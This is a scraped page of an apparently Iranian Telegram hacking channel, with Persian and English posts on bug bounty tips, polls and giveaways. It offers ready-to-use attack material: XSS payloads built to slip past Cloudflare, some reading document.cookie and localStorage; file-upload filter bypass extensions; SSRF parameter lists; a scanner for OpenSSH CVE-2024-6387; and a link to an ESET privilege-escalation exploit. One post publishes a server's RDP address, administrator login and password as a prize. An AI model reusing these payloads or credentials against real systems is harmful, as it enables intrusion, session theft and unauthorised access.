Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
This media is not supported in your browser
VIEW IN TELEGRAM
بدون شرح...

دیس ایز کیبورد🤡
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣7🗿3
⭕️ساعانی پیش متاسفانه گروه هکری irleak خبر از هک برنامه اتاقک داده.⭕️
🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹
بیزینس اتاقک
اجاره ویلا و هتل و ... بوده است.

🐦Twitter
💧Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣4🗿4🔥2
نظرتون با پادکست تست نفوذ(باگ بانتی) چیه؟؟
Anonymous Poll
18%
-
82%
+
🔥5👍2💯1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «نظرتون با پادکست تست نفوذ(باگ بانتی) چیه؟؟»
LazyEgg - Hunting JS Files ⭐️

waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips'


#BugBounty #Tips
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍1💯1
⭕️فردا مسابقه برگزار کنیم؟⭕️
Anonymous Poll
76%
+
24%
-
2🔥2👍1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «⭕️فردا مسابقه برگزار کنیم؟⭕️»
⭕️ ‌ ‌ ‌دوستان عزیز این ایردراپ های که تو چنل معرفی میکنم صرفا به درخواست دوستانه و سعی من بر این بوده که ایردراپی معرفی کنه که واقعا پول بده و اینکه خیلی کم من ایردراپ معرفی میکنم و از محتوای اصلی چنل خارج نمیشم.
جدیدا خیلی از چنل های تلگرامی که داخلشون جوین هستم از تست نفوذ بگیر تا باگ بانتی و معرف پیلود ها محتوای اصلی چنل رو ول کردن تمام تمرکز خودشون گذاشتن برای معرفی ایردراپ و فروش فیلترشکن اخه چرا کسی دلیلشو میدونه؟ ‌ ‌🤨😑
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🗿3
A million dorks😎
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
By entering this GitHub page, you have access to all these remote jobs, and you must use Google Hacking to use these remote jobs.

📱https://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork
Please open Telegram to view this post
VIEW IN TELEGRAM
6🤣2🔥1
Eʀᴏ ··ʜᴀᴄᴋ··
⭕️فردا مسابقه برگزار کنیم؟⭕️
⭕️ ‌ ‌ ‌برای استارت مسابقه فعلا یه سرور مجازی قرار بدیم، اگر حمایت شما بیشتر بدونه فاصله دوباره مسابقه میزاریم.
🎁 ‌ ‌ ‌ ‌زمان مسابقه 8 شب🎁
🎺 ‌ ‌ ‌برای برگزاری مسابقه ری‌اکشن بزارید و چنل رو برای دوستاتون بقرستید🎺
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7💯3👍1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «⭕️ ‌ ‌ ‌برای استارت مسابقه فعلا یه سرور مجازی قرار بدیم، اگر حمایت شما بیشتر بدونه فاصله دوباره مسابقه میزاریم. 🎁 ‌ ‌ ‌ ‌زمان مسابقه 8 شب🎁 🎺 ‌ ‌ ‌برای برگزاری مسابقه ری‌اکشن بزارید و چنل رو برای دوستاتون بقرستید🎺»
⭕️ ‌ ‌ ‌صدای چنل رو باز کنید که رأس ساعت ۸ جایزه رو میزارم☠️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3
🎉🎉🎉🎉🎉🎉🎉🎉🎉🎉
89.185.85.70:3389
administrator
parsa2002@!@!

🔴هرکس برش داشت به ایدی زیر اطلاع بده یا اگر مشکلی بود.
🔤 @GoRunEro
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍1💯1
💀CloudFlare Payload🔪

<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>


#Payload #Cloudflare #Pentest
🔹 🔺 🔹 🔺 🔹 🔺 🔺 🔹 🔺
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥2💯2😐1
📺 یک اسکریپت bash برای nmap برای اسکن ماشین‌های آسیب‌پذیر CVE-2024-6387 با توجه به ورژن آسیب پذیر OpenSSH

nmap -sV -Pn -p22 -iL servers.txt | awk '/Nmap scan report/{ip=$5} /OpenSSH/ {
    if ($5 >= "8.5p1" && $5 < "9.8p1") {
        status = "Vulnerable to CVE-2024-6387"
    } else if ($5 >= "4.4p1" && $5 < "8.5p1") {
        status = "Not vulnerable to CVE-2024-6387 (patched for CVE-2006-5051)"
    } else if ($5 < "4.4p1") {
        status = "Vulnerable to regreSSHion (unless patched for CVE-2006-5051 and CVE-2008-4109)"
    }
    if (status) {
        print "Server: "ip"\t", "OpenSSH Version: "$5"\t", "Status: "status
        status = ""
    }
}'


#POC #CVE_2024_6387

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥72😐2
🔥 تشریح ساده و سریع حمله SSRF

⚡️به طور واضح و ساده نحوه عملکرد و استفاده از این حفره آسیب پذیر رو بیان میکنه
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥1💯1
⁉️ با جاوااسکریپت چه چیزهایی می‌تونیم بسازیم؟!

وب‌سایت‌های تعاملی
برنامه‌های وب تک‌صفحه‌ای (SPA)
بازی‌های مرورگری
اپلیکیشن‌های موبایل (با استفاده از فریمورک‌هایی مثل React Native)
سرورهای وب (با استفاده از Node.js)
برنامه‌های دسکتاپ (با استفاده از Electron)
ابزارهای خط فرمان (CLI)
چت‌بات‌ها
برنامه‌های واقعیت افزوده (AR)

بدون شک جاوااسکریپت جز سه زبان محبوب در کل دنیاست. آینده دار، بازار کار قوی و قدرت فوق‌العاده...

🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥1💯1
Top 25 SSRF parameters 🔓💀

• ?dest={target}
• ?redirect={target}
• ?uri={target}
• ?path={target}
• ?continue={target}
• ?url={target}
• ?window={target}
• ?next={target}
• ?data={target}
• ?reference={target}
• ?site={target}
• ?html={target}
• ?val={target}
• ?validate={target}
• ?domain={target}
• ?callback={target}
• ?return={target}
• ?page={target}
• ?feed={target}
• ?host={target}
• ?port={target}
• ?to={target}
• ?out={target}
• ?view={target}
• ?dir={target}

🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥71👍1
🛠File Upload Bypass💀

😵Blacklisting Bypass
PHP
🤬
→ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr

☠️Whitelisting Bypass☠️
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg


🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍61🔥1🤣1
💀Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path

Exploit Author: Ex3ptionaL

Exploit Date: 2024-04-01

Vendor: https://www.eset.com

Version: 17.0.16.0

Tested on OS: Microsoft Windows 10 pro x64
🔹🔺🔹🔺🔹🔺🔹🔺🔹
🕷 Exploit-db

📂 Download

#Exploit #ESET #NOD32
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥1😐1🗿1